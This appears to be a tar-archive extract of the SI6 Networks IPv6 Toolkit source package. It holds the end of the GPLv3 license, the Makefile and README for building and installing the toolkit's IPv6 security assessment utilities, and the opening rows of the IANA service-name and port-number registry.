violation of this License (for any work) from that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice. Termination of your rights under this section does not terminate the licenses of parties who have received copies or rights from you under this License. If your rights have been terminated and not permanently reinstated, you do not qualify to receive new licenses for the same material under section 10. 9. Acceptance Not Required for Having Copies. You are not required to accept this License in order to receive or run a copy of the Program. Ancillary propagation of a covered work occurring solely as a consequence of using peer-to-peer transmission to receive a copy likewise does not require acceptance. However, nothing other than this License grants you permission to propagate or modify any covered work. These actions infringe copyright if you do not accept this License. Therefore, by modifying or propagating a covered work, you indicate your acceptance of this License to do so. 10. Automatic Licensing of Downstream Recipients. Each time you convey a covered work, the recipient automatically receives a license from the original licensors, to run, modify and propagate that work, subject to this License. You are not responsible for enforcing compliance by third parties with this License. An "entity transaction" is a transaction transferring control of an organization, or substantially all assets of one, or subdividing an organization, or merging organizations. If propagation of a covered work results from an entity transaction, each party to that transaction who receives a copy of the work also receives whatever licenses to the work the party's predecessor in interest had or could give under the previous paragraph, plus a right to possession of the Corresponding Source of the work from the predecessor in interest, if the predecessor has it or can get it with reasonable efforts. You may not impose any further restrictions on the exercise of the rights granted or affirmed under this License. For example, you may not impose a license fee, royalty, or other charge for exercise of rights granted under this License, and you may not initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging that any patent claim is infringed by making, using, selling, offering for sale, or importing the Program or any portion of it. 11. Patents. A "contributor" is a copyright holder who authorizes use under this License of the Program or a work on which the Program is based. The work thus licensed is called the contributor's "contributor version". A contributor's "essential patent claims" are all patent claims owned or controlled by the contributor, whether already acquired or hereafter acquired, that would be infringed by some manner, permitted by this License, of making, using, or selling its contributor version, but do not include claims that would be infringed only as a consequence of further modification of the contributor version. For purposes of this definition, "control" includes the right to grant patent sublicenses in a manner consistent with the requirements of this License. Each contributor grants you a non-exclusive, worldwide, royalty-free patent license under the contributor's essential patent claims, to make, use, sell, offer for sale, import and otherwise run, modify and propagate the contents of its contributor version. In the following three paragraphs, a "patent license" is any express agreement or commitment, however denominated, not to enforce a patent (such as an express permission to practice a patent or covenant not to sue for patent infringement). To "grant" such a patent license to a party means to make such an agreement or commitment not to enforce a patent against the party. If you convey a covered work, knowingly relying on a patent license, and the Corresponding Source of the work is not available for anyone to copy, free of charge and under the terms of this License, through a publicly available network server or other readily accessible means, then you must either (1) cause the Corresponding Source to be so available, or (2) arrange to deprive yourself of the benefit of the patent license for this particular work, or (3) arrange, in a manner consistent with the requirements of this License, to extend the patent license to downstream recipients. "Knowingly relying" means you have actual knowledge that, but for the patent license, your conveying the covered work in a country, or your recipient's use of the covered work in a country, would infringe one or more identifiable patents in that country that you have reason to believe are valid. If, pursuant to or in connection with a single transaction or arrangement, you convey, or propagate by procuring conveyance of, a covered work, and grant a patent license to some of the parties receiving the covered work authorizing them to use, propagate, modify or convey a specific copy of the covered work, then the patent license you grant is automatically extended to all recipients of the covered work and works based on it. A patent license is "discriminatory" if it does not include within the scope of its coverage, prohibits the exercise of, or is conditioned on the non-exercise of one or more of the rights that are specifically granted under this License. You may not convey a covered work if you are a party to an arrangement with a third party that is in the business of distributing software, under which you make payment to the third party based on the extent of your activity of conveying the work, and under which the third party grants, to any of the parties who would receive the covered work from you, a discriminatory patent license (a) in connection with copies of the covered work conveyed by you (or copies made from those copies), or (b) primarily for and in connection with specific products or compilations that contain the covered work, unless you entered into that arrangement, or that patent license was granted, prior to 28 March 2007. Nothing in this License shall be construed as excluding or limiting any implied license or other defenses to infringement that may otherwise be available to you under applicable patent law. 12. No Surrender of Others' Freedom. If conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot convey a covered work so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not convey it at all. For example, if you agree to terms that obligate you to collect a royalty for further conveying from those to whom you convey the Program, the only way you could satisfy both those terms and this License would be to refrain entirely from conveying the Program. 13. Use with the GNU Affero General Public License. Notwithstanding any other provision of this License, you have permission to link or combine any covered work with a work licensed under version 3 of the GNU Affero General Public License into a single combined work, and to convey the resulting work. The terms of this License will continue to apply to the part which is the covered work, but the special requirements of the GNU Affero General Public License, section 13, concerning interaction through a network will apply to the combination as such. 14. Revised Versions of this License. The Free Software Foundation may publish revised and/or new versions of the GNU General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies that a certain numbered version of the GNU General Public License "or any later version" applies to it, you have the option of following the terms and conditions either of that numbered version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of the GNU General Public License, you may choose any version ever published by the Free Software Foundation. If the Program specifies that a proxy can decide which future versions of the GNU General Public License can be used, that proxy's public statement of acceptance of a version permanently authorizes you to choose that version for the Program. Later license versions may give you additional or different permissions. However, no additional obligations are imposed on any author or copyright holder as a result of your choosing to follow a later version. 15. Disclaimer of Warranty. THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. Limitation of Liability. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 17. Interpretation of Sections 15 and 16. If the disclaimer of warranty and limitation of liability provided above cannot be given local legal effect according to their terms, reviewing courts shall apply local law that most closely approximates an absolute waiver of all civil liability in connection with the Program, unless a warranty or assumption of liability accompanies a copy of the Program in return for a fee. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively state the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . Also add information on how to contact you by electronic and paper mail. If the program does terminal interaction, make it output a short notice like this when it starts in an interactive mode: Copyright (C) This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, your program's commands might be different; for a GUI interface, you would use an "about box". You should also get your employer (if you work as a programmer) or school, if any, to sign a "copyright disclaimer" for the program, if necessary. For more information on this, and how to apply and follow the GNU GPL, see . The GNU General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. But first, please read . ipv6toolkit-2.0+ds.1/Makefile000066400000000000000000000144231254360455000160560ustar00rootroot00000000000000# # SI6 Networks' IPv6 toolkit Makefile # # Notes to package developers: # # By default, binaries will be installed in /usr/local/bin, manual pages in # /usr/local/man, data files in /usr/local/share/ipv6toolkit, and configuration # files in /etc # # The path of the binaries and data files can be overriden by setting "PREFIX" # variable accordingly. The path of the manual pages can be overriden by setting # the MANPREFIX variable. Typically, packages will set these variables as follows: # # PREFIX=/usr # MANPREFIX=/usr/share # # Finally, please note that this makefile supports the DESTDIR variable, as # typically employed by package developers. CC?=gcc CFLAGS+= -Wall LDFLAGS+= -lpcap -lm .ifndef(PREFIX) PREFIX=/usr/local .ifndef(MANPREFIX) MANPREFIX=/usr/local .endif .else .ifndef(MANPREFIX) MANPREFIX=/usr/share .endif .endif ETCPATH= $(DESTDIR)/etc MANPATH= $(DESTDIR)$(MANPREFIX)/man DATAPATH= $(DESTDIR)$(PREFIX)/share/ipv6toolkit BINPATH= $(DESTDIR)$(PREFIX)/bin SBINPATH= $(DESTDIR)$(PREFIX)/sbin SRCPATH= tools SBINTOOLS= blackhole6 flow6 frag6 icmp6 jumbo6 na6 ni6 ns6 path6 ra6 rd6 rs6 scan6 script6 tcp6 udp6 BINTOOLS= addr6 TOOLS= $(BINTOOLS) $(SBINTOOLS) LIBS= libipv6.o all: $(TOOLS) data/ipv6toolkit.conf addr6: $(SRCPATH)/addr6.c $(SRCPATH)/addr6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o addr6 $(SRCPATH)/addr6.c $(LIBS) $(LDFLAGS) blackhole6: $(SRCPATH)/blackhole6 cp $(SRCPATH)/blackhole6 ./ flow6: $(SRCPATH)/flow6.c $(SRCPATH)/flow6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o flow6 $(SRCPATH)/flow6.c $(LIBS) $(LDFLAGS) frag6: $(SRCPATH)/frag6.c $(SRCPATH)/frag6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o frag6 $(SRCPATH)/frag6.c $(LIBS) $(LDFLAGS) icmp6: $(SRCPATH)/icmp6.c $(SRCPATH)/icmp6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o icmp6 $(SRCPATH)/icmp6.c $(LIBS) $(LDFLAGS) jumbo6: $(SRCPATH)/jumbo6.c $(SRCPATH)/jumbo6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o jumbo6 $(SRCPATH)/jumbo6.c $(LIBS) $(LDFLAGS) na6: $(SRCPATH)/na6.c $(SRCPATH)/na6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o na6 $(SRCPATH)/na6.c $(LIBS) $(LDFLAGS) ni6: $(SRCPATH)/ni6.c $(SRCPATH)/ni6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o ni6 $(SRCPATH)/ni6.c $(LIBS) $(LDFLAGS) ns6: $(SRCPATH)/ns6.c $(SRCPATH)/ns6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o ns6 $(SRCPATH)/ns6.c $(LIBS) $(LDFLAGS) path6: $(SRCPATH)/path6.c $(SRCPATH)/path6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o path6 $(SRCPATH)/path6.c $(LIBS) $(LDFLAGS) ra6: $(SRCPATH)/ra6.c $(SRCPATH)/ra6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o ra6 $(SRCPATH)/ra6.c $(LIBS) $(LDFLAGS) rd6: $(SRCPATH)/rd6.c $(SRCPATH)/rd6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o rd6 $(SRCPATH)/rd6.c $(LIBS) $(LDFLAGS) rs6: $(SRCPATH)/rs6.c $(SRCPATH)/rs6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o rs6 $(SRCPATH)/rs6.c $(LIBS) $(LDFLAGS) scan6: $(SRCPATH)/scan6.c $(SRCPATH)/scan6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o scan6 $(SRCPATH)/scan6.c $(LIBS) $(LDFLAGS) script6: $(SRCPATH)/script6 cp $(SRCPATH)/script6 ./ tcp6: $(SRCPATH)/tcp6.c $(SRCPATH)/tcp6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o tcp6 $(SRCPATH)/tcp6.c $(LIBS) $(LDFLAGS) udp6: $(SRCPATH)/udp6.c $(SRCPATH)/udp6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o udp6 $(SRCPATH)/udp6.c $(LIBS) $(LDFLAGS) libipv6.o: $(SRCPATH)/libipv6.c $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -c -o libipv6.o $(SRCPATH)/libipv6.c data/ipv6toolkit.conf: echo "# SI6 Networks' IPv6 Toolkit Configuration File" > \ data/ipv6toolkit.conf echo OUI-Database=$(PREFIX)/share/ipv6toolkit/oui.txt >> \ data/ipv6toolkit.conf echo Ports-Database=$(PREFIX)/share/ipv6toolkit/service-names-port-numbers.csv >> \ data/ipv6toolkit.conf clean: rm -f $(TOOLS) $(LIBS) rm -f data/ipv6toolkit.conf install: all # Install the binaries install -m0755 -d $(BINPATH) install -m0755 -d $(SBINPATH) install -m0755 $(BINTOOLS) $(BINPATH) install -m0755 $(SBINTOOLS) $(SBINPATH) # Install the configuration file install -m0755 -d $(ETCPATH) install -m0644 data/ipv6toolkit.conf $(ETCPATH) # Install the IEEE OUI database install -m0755 -d $(DATAPATH) install -m0644 data/oui.txt $(DATAPATH) # Install the port numbers database install -m0644 data/service-names-port-numbers.csv $(DATAPATH) # Install the manual pages install -m0755 -d $(MANPATH)/man1 install -m0644 manuals/*.1 $(MANPATH)/man1 install -m0755 -d $(MANPATH)/man5 install -m0644 manuals/*.5 $(MANPATH)/man5 install -m0755 -d $(MANPATH)/man7 install -m0644 manuals/*.7 $(MANPATH)/man7 uninstall: # Remove the binaries rm -f $(BINPATH)/addr6 rm -f $(SBINPATH)/blackhole6 rm -f $(SBINPATH)/flow6 rm -f $(SBINPATH)/frag6 rm -f $(SBINPATH)/icmp6 rm -f $(SBINPATH)/jumbo6 rm -f $(SBINPATH)/na6 rm -f $(SBINPATH)/ni6 rm -f $(SBINPATH)/ns6 rm -f $(SBINPATH)/path6 rm -f $(SBINPATH)/ra6 rm -f $(SBINPATH)/rd6 rm -f $(SBINPATH)/rs6 rm -f $(SBINPATH)/scan6 rm -f $(SBINPATH)/script6 rm -f $(SBINPATH)/tcp6 rm -f $(SBINPATH)/udp6 # Remove the configuration file rm -f $(ETCPATH)/ipv6toolkit.conf # Remove the IEEE OUI database rm -rf $(DATAPATH) # Remove the manual pages rm -f $(MANPATH)/man1/addr6.1 rm -f $(MANPATH)/man1/blackhole.1 rm -f $(MANPATH)/man1/flow6.1 rm -f $(MANPATH)/man1/frag6.1 rm -f $(MANPATH)/man1/icmp6.1 rm -f $(MANPATH)/man1/jumbo6.1 rm -f $(MANPATH)/man1/na6.1 rm -f $(MANPATH)/man1/ni6.1 rm -f $(MANPATH)/man1/ns6.1 rm -f $(MANPATH)/man1/path6.1 rm -f $(MANPATH)/man1/ra6.1 rm -f $(MANPATH)/man1/rd6.1 rm -f $(MANPATH)/man1/rs6.1 rm -f $(MANPATH)/man1/scan6.1 rm -f $(MANPATH)/man1/script6.1 rm -f $(MANPATH)/man1/tcp6.1 rm -f $(MANPATH)/man1/udp6.1 rm -f $(MANPATH)/man5/ipv6toolkit.conf.5 rm -f $(MANPATH)/man7/ipv6toolkit.7 ipv6toolkit-2.0+ds.1/README.TXT000066400000000000000000000026531254360455000157560ustar00rootroot00000000000000******************************************************************************* * SI6 Networks IPv6 Toolkit v2.0 (Guille) * ******************************************************************************* Description of each of the files and directories: ------------------------------------------------- data: Contains the configuration files and miscellaneous databases. manuals: Contains the manual pages for the security assessment tools. tools: Contains the source code for the security assessment tools. CHANGES.TXT: Contains the changelog of the toolkit CREDITS.TXT: Contains the credits of this project. LICENSE.TXT: Contains the license for this software (GPLv3) README.TXT: This file. Building the tools ------------------ You can build the tools by running the following command: make all You can install the tools, configuration file, database, and existing manual pages by running the following command: make install Note: The libpcap library must be previously installed on the system. The corresponding package is typically named "libpcap-dev". All the tools have been tested to build (both with gcc and clang) and run on Debian GNU/Linux 7.0, Debian GNU/kfreebsd 7.0, FreeBSD 9.0, NetBSD 6.1.1, OpenBSD 5.3, Ubuntu 14.04 LTS, Mac 0S 10.8.0, and OpenSolaris . Bug reports ----------- Please send any bug reports to Fernando Gont ipv6toolkit-2.0+ds.1/data/000077500000000000000000000000001254360455000153235ustar00rootroot00000000000000ipv6toolkit-2.0+ds.1/data/service-names-port-numbers.csv000066400000000000000000040067151254360455000232510ustar00rootroot00000000000000Service Name,Port Number,Transport Protocol,Description,Assignee,Contact,Registration Date,Modification Date,Reference,Service Code,Known Unauthorized Uses,Assignment Notes ,0,tcp,Reserved,[Jon_Postel],[Jon_Postel],,,,,, ,0,udp,Reserved,[Jon_Postel],[Jon_Postel],,,,,, tcpmux,1,tcp,TCP Port Service Multiplexer,[Mark_Lottor],[Mark_Lottor],,,,,, tcpmux,1,udp,TCP Port Service Multiplexer,[Mark_Lottor],[Mark_Lottor],,,,,, compressnet,2,tcp,Management Utility,,,,,,,, compressnet,2,udp,Management Utility,,,,,,,, compressnet,3,tcp,Compression Process,[Bernie_Volz],[Bernie_Volz],,,,,, compressnet,3,udp,Compression Process,[Bernie_Volz],[Bernie_Volz],,,,,, ,4,tcp,Unassigned,,,,,,,, ,4,udp,Unassigned,,,,,,,, rje,5,tcp,Remote Job Entry,[Jon_Postel],[Jon_Postel],,,,,, rje,5,udp,Remote Job Entry,[Jon_Postel],[Jon_Postel],,,,,, ,6,tcp,Unassigned,,,,,,,, ,6,udp,Unassigned,,,,,,,, echo,7,tcp,Echo,[Jon_Postel],[Jon_Postel],,,,,, echo,7,udp,Echo,[Jon_Postel],[Jon_Postel],,,,,, ,8,tcp,Unassigned,,,,,,,, ,8,udp,Unassigned,,,,,,,, discard,9,tcp,Discard,[Jon_Postel],[Jon_Postel],,,,,, discard,9,udp,Discard,[Jon_Postel],[Jon_Postel],,,,,, discard,9,sctp,Discard,[Randall_Stewart],[Randall_Stewart],,,[RFC4960],,, discard,9,dccp,Discard,[Eddie_Kohler],[Eddie_Kohler],,,[RFC4340],1145656131,, ,10,tcp,Unassigned,,,,,,,, ,10,udp,Unassigned,,,,,,,, systat,11,tcp,Active Users,[Jon_Postel],[Jon_Postel],,,,,, systat,11,udp,Active Users,[Jon_Postel],[Jon_Postel],,,,,, ,12,tcp,Unassigned,,,,,,,, ,12,udp,Unassigned,,,,,,,, daytime,13,tcp,Daytime,[Jon_Postel],[Jon_Postel],,,[RFC867],,, daytime,13,udp,Daytime,[Jon_Postel],[Jon_Postel],,,[RFC867],,, ,14,tcp,Unassigned,,,,,,,, ,14,udp,Unassigned,,,,,,,, ,15,tcp,Unassigned [was netstat],,,,,,,, ,15,udp,Unassigned,,,,,,,, ,16,tcp,Unassigned,,,,,,,, ,16,udp,Unassigned,,,,,,,, qotd,17,tcp,Quote of the Day,[Jon_Postel],[Jon_Postel],,,,,, qotd,17,udp,Quote of the Day,[Jon_Postel],[Jon_Postel],,,,,, msp,18,tcp,Message Send Protocol (historic),[Rina_Nethaniel],[Rina_Nethaniel],,,,,, msp,18,udp,Message Send Protocol (historic),[Rina_Nethaniel],[Rina_Nethaniel],,,,,, chargen,19,tcp,Character Generator,,,,,,,, chargen,19,udp,Character Generator,,,,,,,, ftp-data,20,tcp,File Transfer [Default Data],[Jon_Postel],[Jon_Postel],,,,,, ftp-data,20,udp,File Transfer [Default Data],[Jon_Postel],[Jon_Postel],,,,,, ftp-data,20,sctp,FTP,[Randall_Stewart],[Randall_Stewart],,,[RFC4960],,, ftp,21,tcp,File Transfer [Control],[Jon_Postel],[Jon_Postel],,,[RFC959],,,Defined TXT keys: u= p= path= ftp,21,udp,File Transfer [Control],[Jon_Postel],[Jon_Postel],,,[RFC959],,,Defined TXT keys: u= p= path= ftp,21,sctp,FTP,[Randall_Stewart],[Randall_Stewart],,,[RFC4960],,,Defined TXT keys: u= p= path= ssh,22,tcp,The Secure Shell (SSH) Protocol,,,,,[RFC4251],,,Defined TXT keys: u= p= ssh,22,udp,The Secure Shell (SSH) Protocol,,,,,[RFC4251],,,Defined TXT keys: u= p= ssh,22,sctp,SSH,[Randall_Stewart],[Randall_Stewart],,,[RFC4960],,,Defined TXT keys: u= p= telnet,23,tcp,Telnet,[Jon_Postel],[Jon_Postel],,,[RFC854],,,Defined TXT keys: u= p= telnet,23,udp,Telnet,[Jon_Postel],[Jon_Postel],,,[RFC854],,,Defined TXT keys: u= p= ,24,tcp,any private mail system,[Rick_Adams],[Rick_Adams],,,,,, ,24,udp,any private mail system,[Rick_Adams],[Rick_Adams],,,,,, smtp,25,tcp,Simple Mail Transfer,[Jon_Postel],[Jon_Postel],,,,,, smtp,25,udp,Simple Mail Transfer,[Jon_Postel],[Jon_Postel],,,,,, ,26,tcp,Unassigned,,,,,,,, ,26,udp,Unassigned,,,,,,,, nsw-fe,27,tcp,NSW User System FE,[Robert_Thomas],[Robert_Thomas],,,,,, nsw-fe,27,udp,NSW User System FE,[Robert_Thomas],[Robert_Thomas],,,,,, ,28,tcp,Unassigned,,,,,,,, ,28,udp,Unassigned,,,,,,,, msg-icp,29,tcp,MSG ICP,[Robert_Thomas],[Robert_Thomas],,,,,, msg-icp,29,udp,MSG ICP,[Robert_Thomas],[Robert_Thomas],,,,,, ,30,tcp,Unassigned,,,,,,,, ,30,udp,Unassigned,,,,,,,, msg-auth,31,tcp,MSG Authentication,[Robert_Thomas],[Robert_Thomas],,,,,, msg-auth,31,udp,MSG Authentication,[Robert_Thomas],[Robert_Thomas],,,,,, ,32,tcp,Unassigned,,,,,,,, ,32,udp,Unassigned,,,,,,,, dsp,33,tcp,Display Support Protocol,[Ed_Cain],[Ed_Cain],,,,,, dsp,33,udp,Display Support Protocol,[Ed_Cain],[Ed_Cain],,,,,, ,34,tcp,Unassigned,,,,,,,, ,34,udp,Unassigned,,,,,,,, ,35,tcp,any private printer server,[Jon_Postel],[Jon_Postel],,,,,, ,35,udp,any private printer server,[Jon_Postel],[Jon_Postel],,,,,, ,36,tcp,Unassigned,,,,,,,, ,36,udp,Unassigned,,,,,,,, time,37,tcp,Time,[Jon_Postel],[Jon_Postel],,,,,, time,37,udp,Time,[Jon_Postel],[Jon_Postel],,,,,, rap,38,tcp,Route Access Protocol,[Robert_Ullmann],[Robert_Ullmann],,,,,, rap,38,udp,Route Access Protocol,[Robert_Ullmann],[Robert_Ullmann],,,,,, rlp,39,tcp,Resource Location Protocol,[Mike_Accetta],[Mike_Accetta],,,,,, rlp,39,udp,Resource Location Protocol,[Mike_Accetta],[Mike_Accetta],,,,,, ,40,tcp,Unassigned,,,,,,,, ,40,udp,Unassigned,,,,,,,, graphics,41,tcp,Graphics,,,,,,,, graphics,41,udp,Graphics,,,,,,,, name,42,tcp,Host Name Server,,,,,,,, name,42,udp,Host Name Server,,,,,,,, nameserver,42,tcp,Host Name Server,,,,,,,, nameserver,42,udp,Host Name Server,,,,,,,, nicname,43,tcp,Who Is,,,,,,,, nicname,43,udp,Who Is,,,,,,,, mpm-flags,44,tcp,MPM FLAGS Protocol,,,,,,,, mpm-flags,44,udp,MPM FLAGS Protocol,,,,,,,, mpm,45,tcp,Message Processing Module [recv],,,,,,,, mpm,45,udp,Message Processing Module [recv],,,,,,,, mpm-snd,46,tcp,MPM [default send],[Jon_Postel],[Jon_Postel],,,,,, mpm-snd,46,udp,MPM [default send],[Jon_Postel],[Jon_Postel],,,,,, ni-ftp,47,tcp,NI FTP,[Steve_Kille],[Steve_Kille],,,,,, ni-ftp,47,udp,NI FTP,[Steve_Kille],[Steve_Kille],,,,,, auditd,48,tcp,Digital Audit Daemon,[Larry_Scott],[Larry_Scott],,,,,, auditd,48,udp,Digital Audit Daemon,[Larry_Scott],[Larry_Scott],,,,,, tacacs,49,tcp,Login Host Protocol (TACACS),[Pieter_Ditmars],[Pieter_Ditmars],,,,,, tacacs,49,udp,Login Host Protocol (TACACS),[Pieter_Ditmars],[Pieter_Ditmars],,,,,, re-mail-ck,50,tcp,Remote Mail Checking Protocol,[Steve_Dorner],[Steve_Dorner],,,,,, re-mail-ck,50,udp,Remote Mail Checking Protocol,[Steve_Dorner],[Steve_Dorner],,,,,, ,51,,Reserved,,,,2013-05-24,,,,This entry is being removed on 2013-05-24. xns-time,52,tcp,XNS Time Protocol,[Susie_Armstrong],[Susie_Armstrong],,,,,, xns-time,52,udp,XNS Time Protocol,[Susie_Armstrong],[Susie_Armstrong],,,,,, domain,53,tcp,Domain Name Server,[Paul_Mockapetris],[Paul_Mockapetris],,,,,, domain,53,udp,Domain Name Server,[Paul_Mockapetris],[Paul_Mockapetris],,,,,, xns-ch,54,tcp,XNS Clearinghouse,[Susie_Armstrong],[Susie_Armstrong],,,,,, xns-ch,54,udp,XNS Clearinghouse,[Susie_Armstrong],[Susie_Armstrong],,,,,, isi-gl,55,tcp,ISI Graphics Language,,,,,,,, isi-gl,55,udp,ISI Graphics Language,,,,,,,, xns-auth,56,tcp,XNS Authentication,[Susie_Armstrong],[Susie_Armstrong],,,,,, xns-auth,56,udp,XNS Authentication,[Susie_Armstrong],[Susie_Armstrong],,,,,, ,57,tcp,any private terminal access,[Jon_Postel],[Jon_Postel],,,,,, ,57,udp,any private terminal access,[Jon_Postel],[Jon_Postel],,,,,, xns-mail,58,tcp,XNS Mail,[Susie_Armstrong],[Susie_Armstrong],,,,,, xns-mail,58,udp,XNS Mail,[Susie_Armstrong],[Susie_Armstrong],,,,,, ,59,tcp,any private file service,[Jon_Postel],[Jon_Postel],,,,,, ,59,udp,any private file service,[Jon_Postel],[Jon_Postel],,,,,, ,60,tcp,Unassigned,,,,,,,, ,60,udp,Unassigned,,,,,,,, ni-mail,61,tcp,NI MAIL,[Steve_Kille],[Steve_Kille],,,,,, ni-mail,61,udp,NI MAIL,[Steve_Kille],[Steve_Kille],,,,,, acas,62,tcp,ACA Services,[E_Wald],[E_Wald],,,,,, acas,62,udp,ACA Services,[E_Wald],[E_Wald],,,,,, whoispp,63,tcp,"whois++ IANA assigned this well-formed service name as a replacement for ""whois++"".",[Rickard_Schoultz],[Rickard_Schoultz],,,,,, whois++,63,tcp,whois++,[Rickard_Schoultz],[Rickard_Schoultz],,,,,,"This entry is an alias to ""whoispp"". This entry is now historic, not usable for use with many common service discovery mechanisms." whoispp,63,udp,"whois++ IANA assigned this well-formed service name as a replacement for ""whois++"".",[Rickard_Schoultz],[Rickard_Schoultz],,,,,, whois++,63,udp,whois++,[Rickard_Schoultz],[Rickard_Schoultz],,,,,,"This entry is an alias to ""whoispp"". This entry is now historic, not usable for use with many common service discovery mechanisms." covia,64,tcp,Communications Integrator (CI),[Dan_Smith],[Dan_Smith],,,,,, covia,64,udp,Communications Integrator (CI),[Dan_Smith],[Dan_Smith],,,,,, tacacs-ds,65,tcp,TACACS-Database Service,[Kathy_Huber],[Kathy_Huber],,,,,, tacacs-ds,65,udp,TACACS-Database Service,[Kathy_Huber],[Kathy_Huber],,,,,, sql-net,66,tcp,"Oracle SQL*NET IANA assigned this well-formed service name as a replacement for ""sql*net"".",[Jack_Haverty],[Jack_Haverty],,,,,, sql*net,66,tcp,Oracle SQL*NET,[Jack_Haverty],[Jack_Haverty],,,,,,"This entry is an alias to ""sql-net"". This entry is now historic, not usable for use with many common service discovery mechanisms." sql-net,66,udp,"Oracle SQL*NET IANA assigned this well-formed service name as a replacement for ""sql*net"".",[Jack_Haverty],[Jack_Haverty],,,,,, sql*net,66,udp,Oracle SQL*NET,[Jack_Haverty],[Jack_Haverty],,,,,,"This entry is an alias to ""sql-net"". This entry is now historic, not usable for use with many common service discovery mechanisms." bootps,67,tcp,Bootstrap Protocol Server,[Bill_Croft],[Bill_Croft],,,[RFC951],,,Defined TXT keys: None bootps,67,udp,Bootstrap Protocol Server,,,,,,,, bootpc,68,tcp,Bootstrap Protocol Client,[Bill_Croft],[Bill_Croft],,,,,, bootpc,68,udp,Bootstrap Protocol Client,[Bill_Croft],[Bill_Croft],,,,,, tftp,69,tcp,Trivial File Transfer,[David_Clark],[David_Clark],,,,,, tftp,69,udp,Trivial File Transfer,[David_Clark],[David_Clark],,,,,, gopher,70,tcp,Gopher,[Mark_McCahill],[Mark_McCahill],,,,,, 